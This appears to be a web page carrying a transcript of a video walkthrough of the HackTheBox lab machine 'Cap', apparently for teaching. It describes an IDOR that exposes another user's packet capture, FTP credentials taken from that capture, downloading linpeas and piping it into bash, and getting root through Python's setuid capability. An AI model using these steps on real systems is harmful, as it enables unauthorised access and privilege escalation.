HackTheBox - Cap

IppSec · Beginner ·📰 AI News & Updates ·4y ago

Key Takeaways

Exploits a web application using nmap and discovers an IDOR vulnerability to gain access to FTP credentials and escalate privileges using a capability vulnerability

Full Transcript

what's going on youtube this is ipsec i'm doing cap from hack the box which name is extremely relevant to the challenge because the foothold is based upon a packet capture and then the private is based upon a capability it starts off with finding a web page that allows you to download some packet captures that are created around your session but you can download other people's packet captures by just guessing the id so your packing captures probably one two or three if you just go backwards and try like zero you can get a packet capture from admin which is just the ftp so you can view the packing capture extract the ftp password log into the box and then running linpe's you'll find out that python has the set uid permission or set uid capability so you can just open up python import os and do os dot set uid 0 and get root with all that being said let's jump in as always we're going to start for the nmap so dash sc for default scripts sv enumerate versions oh a output all formats put it in the nmap directory and then we'll call it i think cap is the name of this machine and the ip address is 10 10 10 245. this can take some time to run so i'm just going to run this with the v flag so it shows me urban ports as it finds it and we can see right off the bat we have 22 80 and 21. 21 is ftp so it's super quick to test the very first thing i like doing is just net counting to it so 10 10 10 245 port 21 and this gets us the banner we see vs ftpd version 303 so we can do search point vsftp if i can spell that correctly and spell search split correctly as well and we see there's only exploits for two three four i probably would look at like the release date for this as well so we can probably just go to google and say vsftpd changelog is a good word to often get the dates that versions were released and we have something right here so let's see what is this 303 um so the changelog updated version 302 i wonder if there's a different place we could be getting this from o2 versus 303 changes so we can see this was released um doesn't have a date that i see increase let's see this is an email don't really see anything if i click this does this get me to a repo it does tell us 305 is the most up-to-date version but i'm still having trouble finding a date on this i'm going to try doing is w getting this file and it's key to use wget if you just save it with firefox or something you're not going to have this thing so i'm going to run exif tool change log and let's see if this has a old date 2015 july 25th so this is probably around the time that 3830 was released we could go googling more but i'm going to take that as the release date if i use curl and when you do this i don't think you see that um yeah carol does not preserve this by default so that is why i used um wget but that was a huge kind of rabbit hole ftp doesn't change all that much so seeing it to be like six years old isn't really that big of a deal especially a major package like vsftp additionally um search boy doesn't really have anything for version three so i'm just going to assume this is secure and that's why i kind of move on so we've done enough where nmap should be finished so we can look at the results so nmap cap.nmap and the other thing i would be testing is anonymous login so we could just do ftp 10 10 10 2 45 we try anonymous like the theme of this video is apparently going to be spelling but we try logging in we can't get anonymous and also nmap does that by default as part of one of the default scripts so um i don't think we can really do too much more with ftp we could try setting up like a brute force and trying to brute force a username but again well with the brief force of full credential we don't even know the users on this box so that's why i'm not going to start doing any type of brute forcing if i knew a username right off the bat probably would have just set up like hydra or something to brute force that ssh tells us this is a ubuntu box we have g unicorn running on an http server which kind of tells me this is not going to be php um g unicorn is often for python apps it may be used for other things uh let's see is it only python let's see if it says python on their home page it is only python python wsgi web server gateway interface i believe that's what wsgi stands for but it's how you um have python be a middleman normally you put like engine x in front of g unicorn but it is just a web server for python so it is a python application that we are looking at so 10 10 10 2 45 let's take a look at this and because it is python i know not to worry about it being like wordpress joomla drupal all those like php applications and looking at this i'm going to guess probably flask um the two frameworks you generally meet with python are flask and django and django does have a default page i think it by default will create admin uh django is like a lot more feature-rich of a framework than flask as flask is pretty minimal and django has built in like user management things like that so it not having slash admin i'm thinking this is flask before doing anything so let's take a look at what we can do uh oddly enough we're logged in so i'm going to look at cookies so i'm just going to storage and we don't have anything so this is a weird app if i click this and try log out it goes nowhere we just have this anchor text so there's not much i can really do from this point so i'm going to click on security snapshot to see what else is here and then i'm going to do control and click on the other two things so this we have slash data slash 2 and we have a pcap so i'm going to download this and i'm going to look at other things so this is network input or output it looks like the output of ifconfig if i do ifconfig you can see very similar output i'm trying to think of how to get commands maybe i'd like fuzz this and do like cmd equals ls and try understanding how this works it looks like it's just a static page and as i say static page probably not because here is me connecting to port 80. if i do a connection to port 22 ssh101010 245 and we refresh this we should see me also connecting to 22. there it is so not a static page but it doesn't look like there's a way for me to change the command so if i get stuck that's probably what i'm going to revisit and use w fuzz to see if we can fuzz any type of hidden commands just refreshing this like glancing through all the things nothing we could also try other commands so we could try doing a dirt bus there's ip there's netstat we could try like ls see if it's just doing commands the reason why i'm not really going down this route is while this is the netstat output this is not the ip output ip is a command so if i do ip we have help i need to do like ipaddr and it kind of gets me the output this is except i don't have the interface number here so one two three six we don't have that so we can confirm this is indeed ifconfig so just knowing the output of commands right now so let's close those tabs and we downloaded this peak app so let's take a look at it so move downloads to dot pcap here wireshark2.pcapp and we'll see what we have there is get http and is this me yeah this is me sending data to the server so that's interesting it is trying to go for two so i'm going to try one and we actually get something here so let's try zero and this looks like it is an eye door vulnerability that's like indirect object reference so um there's no acls put around these url pages so if you just happen to guess it you can access it um like if i go to this capture page oh if i go to capture it looks like it may set up tcp dom and that's what happens because i go to capture it redirects me to data too but we can download other user sessions if we just guess the id and this is a super common attack um like i think i mentioned it before but like the defcon ticketing system vendor thing was kind of vulnerable to it because it gave you your order id which was sequential and if you just decremented the order id you can get other people's ticket information so again it's a super common attack doesn't normally lead to like access to the server but you generally get access to other features that may be good so let's do move downloads xero.pcapp and we can wireshark this one see if there's anything else so this is a 192 168 network talking to another 192 168. so i'm going to follow tcp stream and we can look at this this is just a http page do let's do tcp stream equals one this looks like another http right click follow so we can kind of view what it is this is getting a css let's go to the next stream http as well uh ctrl alt shift t is the shortcut so this is just responding with a 404 go to the next one oh we have ftp so i press ctrl alt shift t and we have credentials nathan and then bucket hatform3 so i'm going to try that in ftp so let's do ftp 101010 245 nathan paste that password and login successful and we just have user.txt um we don't have like an ssh directory i did dir here hoping that there would be like ssh i can make dirt ssh permission denied so we can't make them if i wanted to it would have to be dot ssh but doesn't look like that exists bash history is pointed to nothing bash rc we could try getting this and modifying it but i don't think i'm user 1001 if i was this uid i probably could because that's the owner read write um and i know i'm not that because i couldn't write the dot ftp directory and even if i was that there is a chance i can't just write files because ftp could be configured in read-only mode but again not much i can do here if i could edit bash rc i would probably put a reverse shell there and the next time the user logs into the system he sends me a shell but again can't edit that file so let's go and try um ssh maybe he just reused that password so ssh with this user the other good files to grab are also anything beginning with a dot like dot vim info well i think there's a dot vim history potentially being created a dot bash history those are all good files to download my clipboard is not what i expect so let's copy that as a control shift there we go so logging in with nathan and we have four zombie processes we got some updates doing ls user.txt and nothing too much here so let's run lin p's so i'm gonna make dirt dub dub dub go in this and then cp slash opt uh was it privilege escalation awesome suite i think there we go priv there we and then we want len p's and lin ps.sh so copy that there and we have to do a web service or python 3 http.server and we can do curl 10 10 14 8 lin ps dot sh pipe it over to bash and we have to specify port 8 000 so specify that and now it is running so i guess while that runs we could take a look at things so i'm going to ssh 10 10 10 to 45 specify nathan and let's see what i would look at right off the bat while that runs is it the wrong clipboard again there we go so my first thing is i want to check out the web server so uh we don't have anything there is it ver dub dub dub html and we have app.pi so let's go take this take a look at it we have flask which is the framework we guessed and let's see templates auto reload limiter the main thing i'm looking for is some type of credential like maybe it connects to a database it doesn't look like it connects to a database so there's no credential there the other thing now i'm looking for is uh what that i um the ip and netstat page so this is the pcap and the reason why is just because um we haven't really looked that much at it let's see as i say that i was just reading this command see if there's any way to get command injection this is how it's doing the capture so if i search for path path is set by something that's not user and then ip let's see how it gets ip request remote address so we can't set any of these things so i know there's no like command injection here because there's no asking for user input so let's go to ip and see what this is this is just doing again osp open ifconfig reading it and printing it so there's no user input there so we can't really exploit anything same thing with netstat no user input it's just hard commands so that's why i'm kind of ignoring all these because there's no place in this application for us to give input we have data slash id and this is where we're giving input to id but it's specifying it is an integer and not really doing that much let's see oh uploads so i was thinking maybe like directory traversal but nothing too special here it doesn't look vulnerable from first glance well it's definitely not vulnerable because the id is just a integer so we can't really put dot dot slash or anything if like we had python so uh python3 and we try a is equal to int and we passed it a underscore one we got error because that's not int so can't really be vulnerable to anything with just specifying integers other than that eye door vulnerability but now we kind of poked around long enough for lin p's to finish so let's take a look at this i'm just gonna go search for my curl and then move up to look at it and let's see we got ubuntu 220 uh pseudoversion1831 [Music] that's the one thing we did not check we didn't check about sudo if we can just um run sudo l enter our password we know the password paste it in uh i may not run sudo so can't really do anything with that date and uptime system stats we have lxd so again lin p's gonna tell us but i always just like double checking so i see lxd i check the groups to see if i'm a member of lxd if i am then we can upload a image and then mount like the root disk to that image it's much like the docker thing if you just go to ipsec.rocks and type in lxd you can see me exploiting it on two different videos cpu info nothing too interesting here environment virtual machine yes unmounted file system [Music] so processor crons sockets whatever there's a reverse shell cron jobs e2 scrub all i don't know what that is that may be a normal one or that may be unique so i'm going to take a look at it because again i don't know it and let's see what this is doing it looks like it's probably something standard uh e2fs i wonder if that's like a file system thing scrub all and i just normally don't use that file system what is it mounted as that's the fs tab sda it's lvm not exactly sure but don't know what that is doesn't look vulnerable placeholder man so no unique crons these are services installed the path system timers everything here looks normal timer files dot sockets again nothing here really just looking for it to highlight something that's just dns so nothing interesting there pseudo l can't find anything users so users with a console nathan and root so we don't have any other users all users and groups nothing last logon interesting enough there is lab but that user doesn't exist anymore so i'm going to check out ls-la slash home and it's just nathan so not sure mysql postgres php looking for a bunch of configs rsync this is just the default config ldap files oh why'd it just come on it just jumped all the way to the bottom for me ovpn nothing permit root login see cloud init files it's in snap normally the things within snap are not too interesting it's like a package manager so users aren't really editing these files so um it's not interesting because it's just from the image chrome bind this is an easy box right it should be somewhere here so these are set uid so i'm looking for anything that is out of the ordinary all these look to be standard set gid it's highlighting at i don't know why not highlighting the whole thing so i don't think it's a vulnerability it's probably just it gripping wrong so we got capabilities and right here we have something so we have python38 capability set uid so it looks like we can use python to set uid and if python's owned by root we can probably set uid to root so let's look at um lsla user bin python 3.8 it is owned by root so let's try this so we're just going to run python 3 and we want os and is it is it os dot set uid uh should be integer not string so os dot set well before i do this let's do os system id so we can see i want to print zero at the end does just do that every time uh who am i okay it's always printing zero it's probably like the exit code not sure but we are nathan so if i do os dot set uid 0 which is who am i again we are now root because we issued the set uid command so we can just do os dot system sh now we drop to a root shell i can go cd slash root and we can access this file so root.text and there you have it that is the box uh this was a lot quicker than i expected i'd normally like my videos to be at least the half hour mark so let's go play with this p cap a little bit more so generally in ctf challenges i don't use wireshark it's just great for the video but what i would do is use zeek and i do dash h we need two flags the first flag we need to do is kill checksum so dash capital c and then the next flag we need is read file so if we do let's make the pcap mv well yeah mv stir to pcap oh i meant to do star.pcapp so let's just move these files out there we go and let's try zeke no checksum read file stir dot pcap and i wonder if we can only do one at a time here there's probably a way to do a directory zero is the interesting one so i'm gonna do zero.pcapp and we have all these lines so this has just parsed the pcap for us we can look at like connection log see what it is we can do ftp and oh by default zeke is hiding this so we can't see the password by default the reason for this is um a lot of people may have it on like a seam and send these logs over to some type of um index or where people can view and you generally don't want to put passwords in splunk elastic gray log things like that because if someone gains access to it they get the password and it's a bad day from there so by default zeke will do things like hide passwords so if we locate ftp grip for zeke to look for this plugin we can edit this if you have trouble installing zeek there should be a video on it right yeah we got scavenger i take a look at this video to um understand more about zeek but we can see there is a ftp one here let's see it's probably main ftp main password let's see password hidden that's not what i want let's try info.zeek it's getting info out of the pcap and we can see it here option default capture password it's set to false change that to true and i probably have to be rude to do this and then we're going to run zeek again so let's do [Music] zeek cr zero.pcapp on ftp.log and now we have nathan and the password um there is z cut i think is it bro cut on here zeke i would um look at this video i don't know where this binary is i have it there as zeke cut but maybe i don't have it here see can i install it it's probably like zeke utils or bro utils and i'm missing a package but if you want to know more i'd look at those programs look at this video because this is where i actually prepared to talk about zika bro ids um i don't know it just offed up my head but if you have the z cut thing you just do z cut user password it will automatically print these two strings for you and just hide all this other stuff but that is how i do it if we had a lot more data on the pcap so hope you guys enjoyed the video take care and i will see you all in next week

Original Description

00:00 - Intro 00:50 - Start of nmap and doing some recon against FTP 02:40 - Having trouble finding a release date, using WGET and examining metadata to see how old a page is 04:45 - Examining the web applicaiton 08:50 - Testing and finding the IDOR Vulnerability 10:00 - Examining the PCAP Downloaded through the IDOR Vulnerability to find FTP Creds 12:12 - SSHing into the box with the credentials from FTP 13:15 - Running LINPEAS, examining the source code of the webapp while it runs 16:45 - Going over the LINPEAS output finding python has the ability to setuid 21:40 - Using the os libary to setuid to root 23:30 - Showing off zeek which would help analyze larger pcaps 24:10 - Changing the Zeek FTP Configuration to show passwords.
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

Related AI Lessons

Chapters (12)

Intro
0:50 Start of nmap and doing some recon against FTP
2:40 Having trouble finding a release date, using WGET and examining metadata to se
4:45 Examining the web applicaiton
8:50 Testing and finding the IDOR Vulnerability
10:00 Examining the PCAP Downloaded through the IDOR Vulnerability to find FTP Creds
12:12 SSHing into the box with the credentials from FTP
13:15 Running LINPEAS, examining the source code of the webapp while it runs
16:45 Going over the LINPEAS output finding python has the ability to setuid
21:40 Using the os libary to setuid to root
23:30 Showing off zeek which would help analyze larger pcaps
24:10 Changing the Zeek FTP Configuration to show passwords.
Up next
News At 10
Channels Television
Watch →